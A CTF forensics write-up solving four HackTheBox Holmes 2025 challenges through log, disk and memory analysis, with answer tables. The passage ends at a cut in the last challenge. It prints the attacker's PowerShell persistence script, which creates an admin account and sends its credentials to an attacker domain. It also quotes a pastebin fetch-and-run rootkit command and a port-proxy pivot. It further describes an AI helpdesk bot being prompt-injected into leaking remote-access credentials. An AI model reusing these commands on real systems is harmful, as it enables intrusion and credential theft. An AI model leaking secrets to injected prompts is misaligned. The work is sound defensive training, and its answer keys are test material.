Forensics - HTB Holmes CTF 2025
Write-ups for all challenges of Hackthebox Holmes CTF 2025
~ The Enduring Echo (easy) ~
Detail
LeStrade passes a disk image artifacts to Watson. It’s one of the identified breach points, now showing abnormal CPU activity and anomalies in process logs.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
01. What was the first (non cd) command executed by the attacker on the host? (string)
02. Which parent process (full path) spawned the attacker’s commands? (C:\FOLDER\PATH\FILE.ext)
03. Which remote-execution tool was most likely used for the attack? (filename.ext)
04. What was the attacker’s IP address? (IPv4 address)
05. What is the first element in the attacker's sequence of persistence mechanisms? (string)
06. Identify the script executed by the persistence mechanism. (C:\FOLDER\PATH\FILE.ext)
07. What local account did the attacker create? (string)
08. What domain name did the attacker use for credential exfiltration? (domain)
09. What password did the attacker's script generate for the newly created user? (string)
10. What was the IP address of the internal system the attacker pivoted to? (IPv4 address)
11. Which TCP port on the victim was forwarded to enable the pivot? (port 0-65565)
12. What is the full registry path that stores persistent IPv4→IPv4 TCP listener-to-target mappings? (HKLM\...\...)
13. What is the MITRE ATT&CK ID associated with the previous technique used by the attacker to pivot to the internal system? (Txxxx.xxx)
14. Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this? (command)
Solution
Question 1: What was the first (non cd) command executed by the attacker on the host?
First of all, we have to investigate the winevt to figure out the attack. I use EvtxECmd of Eric Zimmerman
1
EvtxECmd.exe -d "The_Enduring_Echo\C\Windows\System32\winevt\logs" --csv . --csvf output.csv
We viewed the parsed CSV file using Timeline Explorer, then filtered for Event ID 4688 (A new process has been created). We continue search “cmd” and we observed a remote execution process where WmiPrvSE.exe spawned cmd.exe to execute remote commands.
If we see the command line line of event 4688, this computer has enabled the function to allow capturing command line for “new process has been created” event, so we can use it to answer the questions below
Question 2: Which parent process (full path) spawned the attacker’s commands?
As I said before, WmiPrvSE.exe spawned cmd.exe. So the answer this full path of it
Question 3: Which remote-execution tool was most likely used for the attack?
Based on the evidence, we see that the parent process is WmiPrvSE.exe and Command output redirection to network share Administrative share usage (ADMIN$). All of this matches wmiexec.py
Question 4: What was the attacker’s IP address?
Continue investigate the Security log, we can find the attacker’s IP
1
cmd /C "echo 10.129.242.110 NapoleonsBlackPearl.htb >> C:\Windows\System32\drivers\etc\hosts"
Attacker modified the hosts file to redirect domain names to their infrastructure, maybe use for C2.
Question 5: What is the first element in the attacker’s sequence of persistence mechanisms?
The attacker creates the first persistence mechanism by creating a scheduled task, named SysHelper Update. The executed file is JM.ps1 at C:\Users\Werni\Appdata\Local\
Question 6: Identify the script executed by the persistence mechanism.
As I explain above, the answer of this question is C:\Users\Werni\Appdata\Local\JM.ps1
Question 7: What local account did the attacker create?
To find the answer to this question, we filtered event 4720 and looked at the events that occurred during the time of the attack.
Question 8: What domain name did the attacker use for credential exfiltration?
We can find JM.ps1 on machine, extracted it and we have can figure out what this file do
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
# List of potential usernames
$usernames = @("svc_netupd", "svc_dns", "sys_helper", "WinTelemetry", "UpdaterSvc")
# Check for existing user
$existing = $usernames | Where-Object {
Get-LocalUser -Name $_ -ErrorAction SilentlyContinue
}
# If none exist, create a new one
if (-not $existing) {
$newUser = Get-Random -InputObject $usernames
$timestamp = (Get-Date).ToString("yyyyMMddHHmmss")
$password = "Watson_$timestamp"
$securePass = ConvertTo-SecureString $password -AsPlainText -Force
New-LocalUser -Name $newUser -Password $securePass -FullName "Windows Update Helper" -Description "System-managed service account"
Add-LocalGroupMember -Group "Administrators" -Member $newUser
Add-LocalGroupMember -Group "Remote Desktop Users" -Member $newUser
# Enable RDP
Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
Invoke-WebRequest -Uri "http://NapoleonsBlackPearl.htb/Exchange?data=$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("$newUser|$password")))" -UseBasicParsing -ErrorAction SilentlyContinue | Out-Null
}
We see that this code create a account on Administrators and Remote Desktop Users group. After that, send this creds to the attacker’s domain NapoleonsBlackPearl.htb
Question 9: What password did the attacker’s script generate for the newly created user?
This code generate the password by merge 2 part: String Watson_ and value of $timestamp which getting date at that time and make it to format yyyyMMddHHmmss. We can determine the time by looking the time of creating user svc_netupd (4720)
Because my time zone is GMT+7 so the correct time is: 2025-08-24 16:05:09 (UTC Time). And we have the correct password for svc_netupd user is Watson_20250824160509
Question 10: What was the IP address of the internal system the attacker pivoted to?
1
netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=9999 connectaddress=192.168.1.101 connectport=22
This command was executed after event proxy.bat file was executed. The attacker created a TCP port forward on the Windows host - listening on all IPv4 addresses at local port 9999 and forwarding incoming TCP connections to 192.168.1.101:22. The attacker stored persistent at HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp
Question 11: Which TCP port on the victim was forwarded to enable the pivot?
As I explain… The answer is 9999
Question 12: What is the full registry path that stores persistent IPv4→IPv4 TCP listener-to-target mappings?
As I explain… The answer is HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp
Question 13: What is the MITRE ATT&CK ID associated with the previous technique used by the attacker to pivot to the internal system?
By searching Google, we can find the correct answer is T1090.001
Question 14: Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this?
We can find the commandline of administrator at Powershell history on C\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Final Answer
| Question | Answer |
|---|---|
| 1. What was the first (non cd) command executed by the attacker on the host? | systeminfo |
| 2. Which parent process (full path) spawned the attacker’s commands? | C:\Windows\System32\wbem\WmiPrvSE.exe |
| 3. Which remote-execution tool was most likely used for the attack? | wmiexec.py |
| 4. What was the attacker’s IP address? | 10.129.242.110 |
| 5. What is the first element in the attacker’s sequence of persistence mechanisms? | SysHelper Update |
| 6. Identify the script executed by the persistence mechanism. | C:\Users\Werni\Appdata\Local\JM.ps1 |
| 7. What local account did the attacker create? | svc_netupd |
| 8. What domain name did the attacker use for credential exfiltration? | NapoleonsBlackPearl.htb |
| 9. What password did the attacker’s script generate for the newly created user? | Watson_20250824160509 |
| 10. What was the IP address of the internal system the attacker pivoted to? | 192.168.1.101 |
| 11. Which TCP port on the victim was forwarded to enable the pivot? | 9999 |
| 12. What is the full registry path that stores persistent IPv4→IPv4 TCP listener-to-target mappings? | HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp |
| 13. What is the MITRE ATT&CK ID associated with the previous technique used by the attacker to pivot to the internal system? | T1090.001 |
| 14. Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this? | reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f |
~ The Card (easy) ~
Detail
Holmes receives a breadcrumb from Dr. Nicole Vale - fragments from a string of cyber incidents across Cogwork-1. Each lead ends the same way: a digital calling card signed JM.
1
2
3
4
5
6
7
8
9
10
11
12
01. Analyze the provided logs and identify what is the first User-Agent used by the attacker against Nicole Vale's honeypot.
02. It appears the threat actor deployed a web shell after bypassing the WAF. What is the file name?
03. The threat actor also managed to exfiltrate some data. What is the name of the database that was exfiltrated?
04. During the attack, a seemingly meaningless string seems to be recurring. Which one is it?
05. OmniYard-3 (formerly Scotland Yard) has granted you access to its CTI platform. Browse to the first IP:port address and count how many campaigns appear to be linked to the honeypot attack.
06. How many tools and malware in total are linked to the previously identified campaigns?
07. It appears that the threat actor has always used the same malware in their campaigns. What is its SHA-256 hash?
08. Browse to the second IP:port address and use the CogWork Security Platform to look for the hash and locate the IP address to which the malware connects. (Credentials: nvale/CogworkBurning!)
09. What is the full path of the file that the malware created to ensure its persistence on systems?
10. Finally, browse to the third IP:port address and use the CogNet Scanner Platform to discover additional details about the TA's infrastructure. How many open ports does the server have?
11. Which organization does the previously identified IP belong to?
12. One of the exposed services displays a banner containing a cryptic message. What is it?
Solution
Question 1: Analyze the provided logs and identify what is the first User-Agent used by the attacker against Nicole Vale’s honeypot.
We have three log files. Let’s start with access.log
We see that User-Agent Lilnunc/4A4D - SpecterEye have some suspicious GET request. The destinations are all important data stores and only admins can access them, but we see a lot of 404 requests. So we can confirm that this is an attacker. We also the waf.log, there are many warning about this
Question 2: It appears the threat actor deployed a web shell after bypassing the WAF. What is the file name?
Continue investigate waf.log we can see many rules about webshell are appeared
Question 3: The threat actor also managed to exfiltrate some data. What is the name of the database that was exfiltrated?
Also on waf.log
access.log
application.log
Question 4: During the attack, a seemingly meaningless string seems to be recurring. Which one is it?
Easy to see that, it’s 4A4D
Question 5: OmniYard-3 (formerly Scotland Yard) has granted you access to its CTI platform. Browse to the first IP:port address and count how many campaigns appear to be linked to the honeypot attack.
Filter the entities using “4A4D” and there are total 5 related campaigns
Question 6: How many tools and malware in total are linked to the previously identified campaigns?
There are 5 malwares and 4 tools
Question 7: It appears that the threat actor has always used the same malware in their campaigns. What is its SHA-256 hash?
Click any malware which related to this attack, we can check their hash -> 7477c4f5e6d7c8b9a0f1e2d3c4b5a6f7e8d9c0b1a2f3e4d5c6b7a8f9e0d17477
Question 8: Browse to the second IP:port address and use the CogWork Security Platform to look for the hash and locate the IP address to which the malware connects.
Access to the CogWork Security Platform and browse the known hash, we can find the malware’s network communication.
Question 9: What is the full path of the file that the malware created to ensure its persistence on systems?
In “Detailed analysis” tab, we can find the answer
Question 10: Finally, browse to the third IP:port address and use the CogNet Scanner Platform to discover additional details about the TA’s infrastructure. How many open ports does the server have?
Access to the Cognet Scanner Platform, we see that there are 11 open ports
Question 11: Which organization does the previously identified IP belong to?
In “Details” option, we can find the organization which is SenseShield MSP
Question 12: One of the exposed services displays a banner containing a cryptic message. What is it?
Go to “Services” tab, at unknown port 7477/tcp, there is a cryptic message: He's a ghost I carry, not to haunt me, but to hold me together - NULLINC REVENGE
Final Answer
| Question | Answer |
|---|---|
| 1. Analyze the provided logs and identify what is the first User-Agent used by the attacker against Nicole Vale’s honeypot. | Lilnunc/4A4D - SpecterEye |
| 2. It appears the threat actor deployed a web shell after bypassing the WAF. What is the file name? | temp_4A4D.php |
| 3. The threat actor also managed to exfiltrate some data. What is the name of the database that was exfiltrated? | database_dump_4A4D.sql |
| 4. During the attack, a seemingly meaningless string seems to be recurring. Which one is it? | 4A4D |
| 5. OmniYard-3 (formerly Scotland Yard) has granted you access to its CTI platform. Browse to the first IP:port address and count how many campaigns appear to be linked to the honeypot attack. | 5 |
| 6. How many tools and malware in total are linked to the previously identified campaigns? | 9 |
| 7. It appears that the threat actor has always used the same malware in their campaigns. What is its SHA-256 hash? | 7477c4f5e6d7c8b9a0f1e2d3c4b5a6f7e8d9c0b1a2f3e4d5c6b7a8f9e0d17477 |
| 8. Browse to the second IP:port address and use the CogWork Security Platform to look for the hash and locate the IP address to which the malware connects. (Credentials: nvale/CogworkBurning!) | 74.77.74.77 |
| 9. What is the full path of the file that the malware created to ensure its persistence on systems? | /opt/lilnunc/implant/4a4d_persistence.sh |
| 10. Finally, browse to the third IP:port address and use the CogNet Scanner Platform to discover additional details about the TA’s infrastructure. How many open ports does the server have? | 11 |
| 11. Which organization does the previously identified IP belong to? | SenseShield MSP |
| 12. One of the exposed services displays a banner containing a cryptic message. What is it? | He's a ghost I carry, not to haunt me, but to hold me together - NULLINC REVENGE |
~ The Watchman’s Residue (medium) ~
Detail
With help from D.I. Lestrade, Holmes acquires logs from a compromised MSP connected to the city’s financial core. The MSP’s AI servicedesk bot looks to have been manipulated into leaking remote access keys - an old trick of Moriarty’s.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
1. What was the IP address of the decommissioned machine used by the attacker to start a chat session with MSP-HELPDESK-AI? (IPv4 address)
2. What was the hostname of the decommissioned machine? (string)
3. What was the first message the attacker sent to the AI chatbot? (string)
4. When did the attacker's prompt injection attack make MSP-HELPDESK-AI leak remote management tool info? (YYYY-MM-DD HH:MM:SS)
5. What is the Remote management tool Device ID and password? (IDwithoutspace:Password)
6. What was the last message the attacker sent to MSP-HELPDESK-AI? (string)
7. When did the attacker remotely access Cogwork Central Workstation? (YYYY-MM-DD HH:MM:SS)
8. What was the RMM Account name used by the attacker? (string)
9. What was the machine's internal IP address from which the attacker connected? (IPv4 address)
10. The attacker brought some tools to the compromised workstation to achieve its objectives. Under which path were these tools staged? (C:\FOLDER\PATH\)
11. Among the tools that the attacker staged was a browser credential harvesting tool. Find out how long it ran before it was closed? (Answer in milliseconds) (number)
12. The attacker executed a OS Credential dumping tool on the system. When was the tool executed? (YYYY-MM-DD HH:MM:SS)
13. The attacker exfiltrated multiple sensitive files. When did the exfiltration start? (YYYY-MM-DD HH:MM:SS)
14. Before exfiltration, several files were moved to the staged folder. When was the Heisen-9 facility backup database moved to the staged folder for exfiltration? (YYYY-MM-DD HH:MM:SS)
15. When did the attacker access and read a txt file, which was probably the output of one of the tools they brought, due to the naming convention of the file? (YYYY-MM-DD HH:MM:SS)
16. The attacker created a persistence mechanism on the workstation. When was the persistence setup? (YYYY-MM-DD HH:MM:SS)
17. What is the MITRE ID of the persistence subtechnique? (Txxxx.xxx)
18. When did the malicious RMM session end? (YYYY-MM-DD HH:MM:SS)
19. The attacker found a password from exfiltrated files, allowing him to move laterally further into CogWork-1 infrastructure. What are the credentials for Heisen-9-WS-6? (user:password)
Solution
Question 1: What was the IP address of the decommissioned machine used by the attacker to start a chat session with MSP-HELPDESK-AI?
We have C disk and pcap file. Let’s start with pcap one. Check HTTP POST request, we see that there are many chat sessions (user vs AI). We observed two IP addresses: 10.32.43.31 and 10.0.69.45. Upon checking the frame numbers, the first IP (10.32.43.31) started a chat session at frame 389, while the second IP (10.0.69.45) started at frame 1465.
If we check the message chat of 2 IP, we see that IP 10.0.69.45 is suspicious.
Question 2: What was the hostname of the decommissioned machine?
We can check the hostname by nbns protocol
Question 3: What was the first message the attacker sent to the AI chatbot?
Filter: http.request.method == "POST" and ip.addr == 10.0.69.45
Question 4: When did the attacker’s prompt injection attack make MSP-HELPDESK-AI leak remote management tool info?
To solve this question easily, I will extract all chat message by using last HTTP packet which contain json data. It’s included all information of all chat messsage in the current session
Make it beautiful by using online tool, we determine when did the attacker’s prompt injection make AI leak important info: 2025-08-19 12:02:06
Question 5: What is the Remote management tool Device ID and password?
Easy to see that, ID: 565963039 - Password: CogWork_Central_97&65
Question 6: What was the last message the attacker sent to MSP-HELPDESK-AI?
Filter: http.request.method == "POST" and ip.addr == 10.0.69.45
Question 7: When did the attacker remotely access Cogwork Central Workstation?
We observed TeamViewer installed in the provided files. We can see history connection of it in C\Program Files\TeamViewer\Connections_incoming.txt
1
2
3
545021772 Cog-IT-ADMIN3 13-08-2025 10:12:35 13-08-2025 10:25:05 Cogwork_Admin RemoteControl {584b3e18-f0af-49e9-af50-f4de1b82e8df}
545021772 Cog-IT-ADMIN3 15-08-2025 06:53:09 15-08-2025 06:55:10 Cogwork_Admin RemoteControl {0fa00d03-3c00-46ed-8306-be9b6f2977fa}
514162531 James Moriarty 20-08-2025 09:58:25 20-08-2025 10:14:27 Cogwork_Admin RemoteControl {7ca6431e-30f6-45e3-9ac6-0ef1e0cecb6a}
We see that, the AI chat bot leak credential on 2025-08-19 12:02:06 (mention above), so there is only 1 session with account name = James Moriarty after that. It’s attacker. So the time which attacker remotely access is 2025-08-20 09:58:25
Question 8: What was the RMM Account name used by the attacker?
As mention above, it’s James Moriarty
Question 9: What was the machine’s internal IP address from which the attacker connected?
We check the log of Teamviewer C\Program Files\TeamViewer\Teamviewer15_Logfile.log at the time attacker access.
Question 10: The attacker brought some tools to the compromised workstation to achieve its objectives. Under which path were these tools staged?
The attacker accesss through Teamviewer so he can download/bring tool by using it. Check the log, we observe sth special
All tools are staged on C:\Windows\Temp\safe\
Question 11: Among the tools that the attacker staged was a browser credential harvesting tool. Find out how long it ran before it was closed?
We see that there is a tool related browser credential harvesting, named webbrowserpassview. Upon checking the NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist registry sub key, we can determine the time that tool run is 8 sec = 8000 ms
Question 12: The attacker executed a OS Credential dumping tool on the system. When was the tool executed?
Easy to see that the tool is mimikatz.exe. The time the tool runs is the time its Prefetch file is created. By parsing $J file (Using MFTECmd.exe), we can see the answer: 2025-08-20 10:07:08
Question 13: The attacker exfiltrated multiple sensitive files. When did the exfiltration start?
Checking the TeamViewer logs, we find when the data exfiltration started.
Question 14: Before exfiltration, several files were moved to the staged folder. When was the Heisen-9 facility backup database moved to the staged folder for exfiltration?
In the Teamviewer log, we know the Heisen-9 facility backup databas named Heisen-9 remote snapshot.kdbx.Looking at the parsed $J file, we see that there are 2 timestamps of existence: The 1st one is the file that was first created on the computer; The 2nd one is move/copy to somewhere. So answer for this question is 2nd timestamp: 2025-08-20 10:11:09
Question 15: When did the attacker access and read a txt file, which was probably the output of one of the tools they brought, due to the naming convention of the file?
On exfiltration stage, attacker download a file txt named dump.txt. In the directory C:\Users\Cogwork_Admin\AppData\Roaming\Microsoft\Windows\Recent\, we find a LNK file pointing to dump.txt. Parsing it and we have the answer: ``
Question 16: The attacker created a persistence mechanism on the workstation. When was the persistence setup?
In the TeamViewer logs we see that a suspicious file was downloaded to client, named JM.exe. Searching for this file name in the HKLM\SOFTWARE hive we find that an entry for Winlogon points to this file.
We see that key Winlogon was last write on 2025-08-20 10:13:57, which means the persistence was added at that time.
Question 17: What is the MITRE ID of the persistence subtechnique?
Searching google, we know the answer is T1547.004
Question 18: When did the malicious RMM session end?
We can find the answer on C\Program Files\TeamViewer\Connections_incoming.txt which mentioned at question 7
Question 19: The attacker found a password from exfiltrated files, allowing him to move laterally further into CogWork-1 infrastructure. What are the credentials for Heisen-9-WS-6?
There is no hint about password of exfiltrated file .kdbx so we have to crack it. To do this, we can use keepass2john and hashcat/john
The password to open database is cutiepie14. Use it to open database and we can find the answer: Werni:Quantum1!
Final Answer
| Question | Answer |
|---|---|
| 1. What was the IP address of the decommissioned machine used by the attacker to start a chat session with MSP-HELPDESK-AI? | 10.0.69.45 |
| 2. What was the hostname of the decommissioned machine? | WATSON-ALPHA-2 |
| 3. What was the first message the attacker sent to the AI chatbot? | Hello Old Friend |
| 4. When did the attacker’s prompt injection attack make MSP-HELPDESK-AI leak remote management tool info? | 2025-08-19 12:02:06 |
| 5. What is the Remote management tool Device ID and password? | 565963039:CogWork_Central_97&65 |
| 6. What was the last message the attacker sent to MSP-HELPDESK-AI? | JM WILL BE BACK |
| 7. When did the attacker remotely access Cogwork Central Workstation? | 2025-08-20 09:58:25 |
| 8. What was the RMM Account name used by the attacker? | James Moriarty |
| 9. What was the machine’s internal IP address from which the attacker connected? | 192.168.69.213 |
| 10. The attacker brought some tools to the compromised workstation to achieve its objectives. Under which path were these tools staged? | C:\Windows\Temp\safe\ |
| 11. Among the tools that the attacker staged was a browser credential harvesting tool. Find out how long it ran before it was closed? | 8000 |
| 12. The attacker executed a OS Credential dumping tool on the system. When was the tool executed? | 2025-08-20 10:07:08 |
| 13. The attacker exfiltrated multiple sensitive files. When did the exfiltration start? | 2025-08-20 10:12:07 |
| 14. Before exfiltration, several files were moved to the staged folder. When was the Heisen-9 facility backup database moved to the staged folder for exfiltration? | 2025-08-20 10:11:09 |
| 15. When did the attacker access and read a txt file, which was probably the output of one of the tools they brought, due to the naming convention of the file? | 2025-08-20 10:08:06 |
| 16. The attacker created a persistence mechanism on the workstation. When was the persistence setup? | 2025-08-20 10:13:57 |
| 17. What is the MITRE ID of the persistence subtechnique? | T1547.004 |
| 18. When did the malicious RMM session end? | 20-08-2025 10:14:27 |
| 19. The attacker found a password from exfiltrated files, allowing him to move laterally further into CogWork-1 infrastructure. What are the credentials for Heisen-9-WS-6? | Werni:Quantum1! |
~ The Tunnel Without Walls (hard) ~
Detail
A memory dump from a connected Linux machine reveals covert network connections, fake services, and unusual redirects. Holmes investigates further to uncover how the attacker is manipulating the entire network!
1
2
3
4
5
6
7
8
9
10
1. What is the Linux kernel version of the provided image? (string)
2. The attacker connected over SSH and executed initial reconnaissance commands. What is the PID of the shell they used? (number)
3. After the initial information gathering, the attacker authenticated as a different user to escalate privileges. Identify and submit that user's credentials. (user:password)
4. The attacker downloaded and executed code from Pastebin to install a rootkit. What is the full path of the malicious file? (/path/filename.ext)
5. What is the email account of the alleged author of the malicious file? (user@example.com)
6. The next step in the attack involved issuing commands to modify the network settings and installing a new package. What is the name and PID of the package? (package name,PID)
7. Clearly, the attacker's goal is to impersonate the entire network. One workstation was already tricked and got its new malicious network configuration. What is the workstation's hostname?
8. After receiving the new malicious network configuration, the user accessed the City of CogWork-1 internal portal from this workstation. What is their username? (string)
9. Finally, the user updated a software to the latest version, as suggested on the internal portal, and fell victim to a supply chain attack. From which Web endpoint was the update downloaded?
10. To perform this attack, the attacker redirected the original update domain to a malicious one. Identify the original domain and the final redirect IP address and port. (domain,IP:port)
Solution
Question 1: What is the Linux kernel version of the provided image?
In this challenge, we are tasked to analyze the attached memory dump, memdump.mem, which is a dump from a Linux machine.
To find the Linux kernel version, we can use plugin banners of Volatility3 and the answer is 5.10.0-35-amd64
Question 2: The attacker connected over SSH and executed initial reconnaissance commands. What is the PID of the shell they used?
In this challenge, the Vol3 does not have the symbols for this version Linux so we have to create it or we can download it from github :D
Link: https://github.com/Abyss-W4tcher/volatility3-symbols
First, I use plugin pslist and pstree to check the. To answer this question, we have to focus SSH process first and look at child of it. The answer is 13608
python3 ~/Desktop/Tools/volatility3/vol.py -f memdump.mem linux.pslist
python3 ~/Desktop/Tools/volatility3/vol.py -f memdump.mem linux.pstree
Question 3: After the initial information gathering, the attacker authenticated as a different user to escalate privileges. Identify and submit that user’s credentials.
To find what user the attacker authenticated as, we can dump the bash history
python3 ~/Desktop/Tools/volatility3/vol.py -f memdump.mem linux.bash
We know the user is jm. So what about password? We know that all password in Linux are saved /etc/shadow in hash form. So using strings + grep, we can find the value of it :D
1
2
3
4
5
6
7
└─$ strings memdump.mem > strings.txt
└─$ cat strings.txt | grep -i 'jm:'
jM:Uz
jm:$1$jm$poAH2RyJp8ZllyUvIkxxd0:0:0:root:/root:/bin/bash
jm:$1$jm$poAH2RyJp8ZllyUvIkxxd0:0:0:root:/root:/bin/bash
# ......
Well we have the value, let’s try crack it by using hashcat/john.
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
And we have the password is WATSON0. Therefore, the answer is jm:WATSON0
Question 4: The attacker downloaded and executed code from Pastebin to install a rootkit. What is the full path of the malicious file?
The output of plugin linux.bash make we know attacker download and execute code by using command wget -q -O- https://pastebin.com/raw/hPEBtinX|sh
Because it’s rootkit which hide in kernel module. We can use plugin linux.hidden_modules to check it
python3 ~/Desktop/Tools/volatility3/vol.py -f memdump.mem linux.hidden_module
In the output we see that there is a suspicious module named Nullincrevenge. Check it with all file by using plugin linux.pagecache.Files and we have the answer
1
2
3
4
5
python3 ~/Desktop/Tools/volatility3/vol.py -f memdump.mem linux.pagecache.Files > files
cat files | grep -i 'nullincrevenge'
# output
0x9b33882a9000 / 8:1 298762 0x9b3386454a80 REG 135 39 -rw-r--r-- 2025-09-03 08:18:44.155080 UTC 2025-09-03 08:18:40.799070 UTC 2025-09-03 08:18:40.799070 UTC /usr/lib/modules/5.10.0-35-amd64/kernel/lib/Nullincrevenge.ko 551688
Question 5: What is the email account of the alleged author of the malicious file?
We can dump this file through inode addr using plugin linux.pagecache.InodePages
python3 ~/Desktop/Tools/volatility3/vol.py -f memdump.mem linux.pagecache.InodePages --inode=0x9b3386454a80 --dump
After that, we can use regex to find email address
1
2
└─$ strings inode_0x9b3386454a80.dmp | grep -oE '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
i-am-the@network.now
Question 6: The next step in the attack involved issuing commands to modify the network settings and installing a new package. What is the name and PID of the package?
In the bash history, we find the following commands:
1
2
3
4
5
22714 bash 2025-09-03 08:20:31.000000 UTC apt install -y dnsmasq
22714 bash 2025-09-03 08:20:50.000000 UTC rm /etc/dnsmasq.conf
22714 bash 2025-09-03 08:20:56.000000 UTC nano /etc/dnsmasq.conf
22714 bash 2025-09-03 08:21:23.000000 UTC systemctl enable --now dnsmasq
22714 bash 2025-09-03 08:21:30.000000 UTC systemctl restart dnsmasq
The new package is dnsmasq. Search it on output of pstree we have the PID is 38687
1
2
└─$ cat pstree | grep -i 'dnsmasq'
* 0x9b32812d6000 38687 38687 1 dnsmasq
Question 7: Clearly, the attacker’s goal is to impersonate the entire network. One workstation was already tricked and got its new malicious network configuration. What is the workstation’s hostname?
We can check lease of dnsmasq
1
2
3
4
5
6
7
└─$ cat files| grep -i 'dnsmasq' | grep -i 'leases'
0x9b33882a9000 / 8:1 1053842 0x9b33ac25b8c0 REG 1 1 -rw-r--r-- 2025-09-03 08:21:31.015480 UTC 2025-09-03 08:24:31.095851 UTC 2025-09-03 08:24:31.095851 UTC /var/lib/misc/dnsmasq.leases 81
└─$ python3 ~/Desktop/Tools/volatility3/vol.py -f memdump.mem linux.pagecache.InodePages --inode=0x9b33ac25b8c0 --dump
└─$ cat inode_0x9b33ac25b8c0.dmp
1756891471 00:50:56:b4:32:cd 192.168.211.52 Parallax-5-WS-3 01:00:50:56:b4:32:cd
The answer is Parallax-5-WS-3
Question 8: After receiving the new malicious network configuration, the user accessed the City of CogWork-1 internal portal from this workstation. What is their username?
In this question we can search all POST request (strings + grep :D) or we can search string username=. And we have the answer is mike.sullivan
Question 9: Finally, the user updated a software to the latest version, as suggested on the internal portal, and fell victim to a supply chain attack. From which Web endpoint was the update downloaded?
In bash history, we see that attacker run the docker, let’s check the log file of it. First we have to know container ID by using plugin linux.psaux
python3 ~/Desktop/Tools/volatility3/vol.py -f memdump.mem linux.psaux
Let’s check the Docker log file
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
└─$ cat files | grep -i 'd4759510b68a19bfd55ecb3675bcb3fe88ae0c4a648899ff944a34a234fef2cc-json'
0x9b33882a9000 / 8:1 1055551 0x9b339df93420 REG 1 1 -rw-r----- 2025-09-03 08:22:11.199606 UTC 2025-09-03 08:25:48.595868 UTC 2025-09-03 08:25:48.595868 UTC /var/lib/docker/containers/d4759510b68a19bfd55ecb3675bcb3fe88ae0c4a648899ff944a34a234fef2cc/d4759510b68a19bfd55ecb3675bcb3fe88ae0c4a648899ff944a34a234fef2cc-json.log 2542
└─$ python3 ~/Desktop/Tools/volatility3/vol.py -f memdump.mem linux.pagecache.InodePages --inode=0x9b339df93420 --dump
└─$ cat inode_0x9b339df93420.dmp
{"log":"/docker-entrypoint.sh: /docker-entrypoint.d/ is not empty, will attempt to perform configuration\n","stream":"stdout","time":"2025-09-03T08:22:11.382181855Z"}
{"log":"/docker-entrypoint.sh: Looking for shell scripts in /docker-entrypoint.d/\n","stream":"stdout","time":"2025-09-03T08:22:11.382224094Z"}
{"log":"/docker-entrypoint.sh: Launching /docker-entrypoint.d/10-listen-on-ipv6-by-default.sh\n","stream":"stdout","time":"2025-09-03T08:22:11.382230667Z"}
{"log":"10-listen-on-ipv6-by-default.sh: info: can not modify /etc/nginx/conf.d/default.conf (read-only file system?)\n","stream":"stdout","time":"2025-09-03T08:22:11.382236067Z"}
{"log":"/docker-entrypoint.sh: Sourcing /docker-entrypoint.d/15-local-resolvers.envsh\n","stream":"stdout","time":"2025-09-03T08:22:11.382241367Z"}
{"log":"/docker-entrypoint.sh: Launching /docker-entrypoint.d/20-envsubst-on-templates.sh\n","stream":"stdout","time":"2025-09-03T08:22:11.382246396Z"}
{"log":"/docker-entrypoint.sh: Launching /docker-entrypoint.d/30-tune-worker-processes.sh\n","stream":"stdout","time":"2025-09-03T08:22:11.390057117Z"}
{"log":"/docker-entrypoint.sh: Configuration complete; ready for start up\n","stream":"stdout","time":"2025-09-03T08:22:11.391743736Z"}
{"log":"2025/09/03 08:22:11 [notice] 1#1: using the \"epoll\" event method\n","stream":"stderr","time":"2025-09-03T08:22:11.400446211Z"}
{"log":"2025/09/03 08:22:11 [notice] 1#1: nginx/1.29.1\n","stream":"stderr","time":"2025-09-03T08:22:11.400462552Z"}
{"log":"2025/09/03 08:22:11 [notice] 1#1: built by gcc 14.2.0 (Alpine 14.2.0) \n","stream":"stderr","time":"2025-09-03T08:22:11.40047745Z"}
{"log":"2025/09/03 08:22:11 [notice] 1#1: OS: Linux 5.10.0-35-amd64\n","stream":"stderr","time":"2025-09-03T08:22:11.400482409Z"}
{"log":"2025/09/03 08:22:11 [notice] 1#1: getrlimit(RLIMIT_NOFILE): 1048576:1048576\n","stream":"stderr","time":"2025-09-03T08:22:11.400487058Z"}
{"log":"2025/09/03 08:22:11 [notice] 1#1: start worker processes\n","stream":"stderr","time":"2025-09-03T08:22:11.400651246Z"}
{"log":"2025/09/03 08:22:11 [notice] 1#1: start worker process 21\n","stream":"stderr","time":"2025-09-03T08:22:11.40165961Z"}
{"log":"2025/09/03 08:22:11 [notice] 1#1: start worker process 22\n","stream":"stderr","time":"2025-09-03T08:22:11.401687142Z"}
{"log":"192.168.211.52 - - [03/Sep/2025:08:25:48 +0000] \"GET /win10/update/CogSoftware/AetherDesk-v74-77.exe HTTP/1.1\" 200 12084 \"-\" \"AetherDesk/73.0 (Windows NT 10.0; Win64; x64)\" \"-\"\n","stream":"stdout","time":"2025-09-03T08:25:48.599517549Z"}
Well there is GET request to endpoint /win10/update/CogSoftware/AetherDesk-v74-77.exe
Question 10: To perform this attack, the attacker redirected the original update domain to a malicious one. Identify the original domain and the final redirect IP address and port.
We can check the config file of dnsmasq
1
2
